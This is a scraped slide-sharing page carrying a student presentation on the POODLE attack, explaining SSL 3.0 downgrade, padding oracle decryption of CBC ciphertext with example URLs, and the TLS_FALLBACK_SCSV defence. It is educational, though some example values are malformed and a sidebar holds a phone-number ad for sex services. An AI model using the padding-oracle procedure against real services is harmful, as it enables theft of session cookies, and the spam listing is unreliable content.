microwave assisted reaction. General introduction
 
JAPAN: ORGANISATION OF PMDA, PHARMACEUTICAL LAWS & REGULATIONS, TYPES OF REGI...
JAPAN: ORGANISATION OF PMDA, PHARMACEUTICAL LAWS & REGULATIONS, TYPES OF REGI...JAPAN: ORGANISATION OF PMDA, PHARMACEUTICAL LAWS & REGULATIONS, TYPES OF REGI...
JAPAN: ORGANISATION OF PMDA, PHARMACEUTICAL LAWS & REGULATIONS, TYPES OF REGI...
 
social pharmacy d-pharm 1st year by Pragati K. Mahajan
social pharmacy d-pharm 1st year by Pragati K. Mahajansocial pharmacy d-pharm 1st year by Pragati K. Mahajan
social pharmacy d-pharm 1st year by Pragati K. Mahajan
 
Advance Mobile Application Development class 07
Advance Mobile Application Development class 07Advance Mobile Application Development class 07
Advance Mobile Application Development class 07
 
Separation of Lanthanides/ Lanthanides and Actinides
Separation of Lanthanides/ Lanthanides and ActinidesSeparation of Lanthanides/ Lanthanides and Actinides
Separation of Lanthanides/ Lanthanides and Actinides
 
Sanyam Choudhary Chemistry practical.pdf
Sanyam Choudhary Chemistry practical.pdfSanyam Choudhary Chemistry practical.pdf
Sanyam Choudhary Chemistry practical.pdf
 
Q4-W6-Restating Informational Text Grade 3
Q4-W6-Restating Informational Text Grade 3Q4-W6-Restating Informational Text Grade 3
Q4-W6-Restating Informational Text Grade 3
 
POINT- BIOCHEMISTRY SEM 2 ENZYMES UNIT 5.pptx
POINT- BIOCHEMISTRY SEM 2 ENZYMES UNIT 5.pptxPOINT- BIOCHEMISTRY SEM 2 ENZYMES UNIT 5.pptx
POINT- BIOCHEMISTRY SEM 2 ENZYMES UNIT 5.pptx
 
SOCIAL AND HISTORICAL CONTEXT - LFTVD.pptx
SOCIAL AND HISTORICAL CONTEXT - LFTVD.pptxSOCIAL AND HISTORICAL CONTEXT - LFTVD.pptx
SOCIAL AND HISTORICAL CONTEXT - LFTVD.pptx
 
Paris 2024 Olympic Geographies - an activity
Paris 2024 Olympic Geographies - an activityParis 2024 Olympic Geographies - an activity
Paris 2024 Olympic Geographies - an activity
 
9548086042 for call girls in Indira Nagar with room service
9548086042 for call girls in Indira Nagar with room service9548086042 for call girls in Indira Nagar with room service
9548086042 for call girls in Indira Nagar with room service
 
The Most Excellent Way | 1 Corinthians 13
The Most Excellent Way | 1 Corinthians 13The Most Excellent Way | 1 Corinthians 13
The Most Excellent Way | 1 Corinthians 13
 
Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...
Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...
Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...
 
Beyond the EU: DORA and NIS 2 Directive's Global Impact
Beyond the EU: DORA and NIS 2 Directive's Global ImpactBeyond the EU: DORA and NIS 2 Directive's Global Impact
Beyond the EU: DORA and NIS 2 Directive's Global Impact
 
Student login on Anyboli platform.helpin
Student login on Anyboli platform.helpinStudent login on Anyboli platform.helpin
Student login on Anyboli platform.helpin
 
Web & Social Media Analytics Previous Year Question Paper.pdf
Web & Social Media Analytics Previous Year Question Paper.pdfWeb & Social Media Analytics Previous Year Question Paper.pdf
Web & Social Media Analytics Previous Year Question Paper.pdf
 
The basics of sentences session 2pptx copy.pptx
The basics of sentences session 2pptx copy.pptxThe basics of sentences session 2pptx copy.pptx
The basics of sentences session 2pptx copy.pptx
 

Poodle

  • 1. POODLE Padding Oracle On Downgraded Legacy Encryption. Shreyas Kothari (140302003) M.Tech (CNIS)
  • 2. Introduction • Secure Socket Layer (SSL) protocol was discovered to provide secure transmission between two parties. This protocol became industry standard and was widely adopted by Vendors in their products to give a secure channel for data transmission. • However from time to time this various vulnerabilities like Man in the middle attack (MITM), POODLE attack etc. were discovered in SSL protocol resulting in different versions of this protocol termed as 1.0, 2.0, and 3.0. Due to this a new standard has been developed named as TLS and it also has its various version namely TLS 1.0, TLS 1.1, TLS 1.2.
  • 3. Introduction – Contd. • Since SSL was widely adopted so it would not have been economical to replace all SSL products with TLS. Thus TLS have been made backward compatible with SSL to provide smooth user experience. • Even if both client and server are TLS compatible, many clients offer a protocol downgrade dance to avoid any interoperability bugs. Due to this behaviour a new Vulnerability termed as POODLE (Padding Oracle on Downgraded Legacy Encryption) was discovered. • Due to this vulnerability, attacker can steal bearer tokens such as HTTP cookies.
  • 4. What is POODLE Attack ? • As stated in the previous slides, many TLS clients offer a protocol downgrade dance to avoid any interoperability bugs. • This means that whenever a handshake starts, highest protocol version supported by client is presented. • If server is not compatible with the protocol version presented by client, then handshake fails and later the handshake is successful by server informing the best TLS/SSL version it can support. • Here is the point.
  • 5. Contd. • If the network between client and server is controlled by an attacker then it can impersonate for both entities and can cause the connection to fall back to SSL 3.0. So the initial vector for this attack is the protocol downgrade dance supported by clients. • Once the channel between the entities is moved down to SSL 3.0 then this vulnerability can be exploited. • Vulnerability exploited is the known Padding Oracle attack. • Since SSL authenticate before encryption, this design flaw in SSL has made this vulnerability possible. Oracle padding attack is done against the CBC mode ciphers in the SSLv3.
  • 7. Padding • Padding adds those extra few bits which are necessary before encryption to make a meaningful block. • Here we are interested to know the padding scheme PKCS#5 as it is used in the CBC Mode. • In PKCS#5, the final block of plaintext is padded with N bytes of value N.
  • 9. Padding Oracle Attack • In Cryptography, an “oracle” is a system that performs cryptographic actions by taking in certain input. • Hence a “padding oracle” is a type of system that takes in encrypted data from the user, decrypts it and verifies whether the padding is correct or not. • Let us now try to understand that how this attack is performed.
  • 10. Padding Oracle Attack • Consider the below URL. • https://www.example.com/home.asp?UID=8A219A434525535FF324 D4G56FC9534 • Let us assume that some information is sent in this UID parameter (say username) in encrypted form using the CBC mode and PKCS #5 standard. So the application decrypts this value and returns the results based on that value.
  • 11. Padding Oracle Attack • Three Scenarios are possible • Case 1) Valid cipher text – Valid and normal page • Case 2) Invalid cipher text [with improper padding] – Invalid page [such as 404 – Not Found] • Case 3) Valid cipher text but invalid padding [error]
  • 12. Padding Oracle Attack • Case 1: • Say you sent the value UID=8A219A434525535FF324D4G56FC95348 and it decrypts to a valid user “Shreyas”. Then the application would send a normal response. • Case 2: • Say you sent the value UID=998877PA434525535FF324D4G56FC95348 and it decrypts to “aswjkaja” (invalid user). The application might respond back with a 404 message saying no such page exists.
  • 13. Padding Oracle Attack • Case 3: • Say you sent the value UID=66IXS7IA434525535FF324D4G56FC95348 and it decrypts to “Ravi” (valid user) but with invalid padding. The application would return some exception. • Thus, if you can send different cipher texts and find out if they decrypt to different values with valid padding or not then you can decrypt any given cipher text.
  • 14. Padding Oracle Attack • In CBC decryption, each cipher text is passed through the cipher, then XORed with the previous cipher text block to give the plaintext. • So if you take our above example, the cipher blocks would be first created as shown below. • https://www.example.com/home.asp?UID=8A219A43|4525535F|F32 4D4G5|6FC9534 • Cipher blocks: 8A219A43| 4525535F| F324D4G5| 6FC95348
  • 16. Padding Oracle Attack • If the request with initial block of all zeros is sent, it would most probably result in 500, since it might not decrypt to any valid value. • https://www.example.com/home.asp?UID=00000000|4525535F|F32 4D4G5|6FC95348
  • 17. Padding Oracle Attack • But now send the same request by initializing the value of this initial block by 1. • https://www.example.com/home.asp?UID=00000001|4525535F|F32 4D4G5|6FC95348
  • 18. Padding Oracle Attack • Although the server returns the error message but still the last value of the decrypted cipher text has changed since you sent 0x01 in the request. • Thus we keep on repeating this step up to FF, we will once hit a value that produces a valid padding sequence. • Only one value out of 256 different possibilities will produce a correct padding byte. • When you hit this value, you should end up with a different response than the other 255 requests.
  • 20. Padding Oracle Attack • From this, we can now calculate the intermediate value at this position, since we know that when XORed with 0x3C, it produces 0x01. • If [ Intermediate Value ] ^ 0x3C = 0x01 • That implies, 0x3C ^ 0x01 = Intermediate Value • Hence, Intermediate Value = 0x3D • Using this technique, we can work our way backwards through the entire block until every byte of the intermediate value is cracked, thus getting the decrypted value one at a time.
  • 21. Padding Oracle Attack on SSL 3.0 • Let us take one example to understand how Padding Oracle Attack is performed on SSL 3.0. • Suppose a request contains sensitive data like HTTP Cookies in one of the blocks. • That block is replaced by the last block of the request which is the padding block. • Than the Padding Oracle Attack is carried out and thus the sensitive data can be revealed because of this vulnerability.
  • 22. You can check whether your browser is vulnerable to POODLE Attack. Go to the following website to check. https://www.poodletest.com
  • 25. You can check whether any website is vulnerable to POODLE Attack or not. Go to the following Website https://www.poodlescan.com
  • 28. Protection against POODLE Attack • The only way to avoid this attack as of now is to disable or avoid using SSL 3.0 and upgrade to TLS. • FOR TLS clients and servers: TLS clients that do protocol downgrade dance should include the TLS_FALLBACK_SCSV in ClientHello.cipher_suites in any fall back handshakes. • This value will indicate that a possible downgrade attack is underway and the connection will be refused. TLS on seeing TLS_FALLBACK_SCSV in ClientHello.cipher_suites will check the SSL/TLS version stated by client and if TLS server has a highest version then that connection will be terminated.
  • 29. TLS_FALLBACK_SCSV • TLS Fallback Signaling Cipher Suite Value (SCSV) prevents the downgrade attack. • TLS_FALLBACK_SCSV {0x56, 0x00} • This is a signalling cipher suite value, i.e., it does not actually correspond to a suite of cryptosystems, and it can never be selected by the server in the handshake. • If this message appears in the ClientHello.cipher_suite message and the highest protocol version supported by the server is higher than that of the client than the server must respond with inappropriate_fallback alert. This is a fetal error.
  • 31. References • Padding Oracle Attack • http://resources.infosecinstitute.com/padding-oracle-attack-2/ • POODLE Attack • http://resources.infosecinstitute.com/end-ssl-poodle/ • Poodle Bites - Exploiting the SSL 3.0 Fallback • https://www.openssl.org/~bodo/ssl-poodle.pdf • PKCS #5 • http://tools.ietf.org/html/rfc2898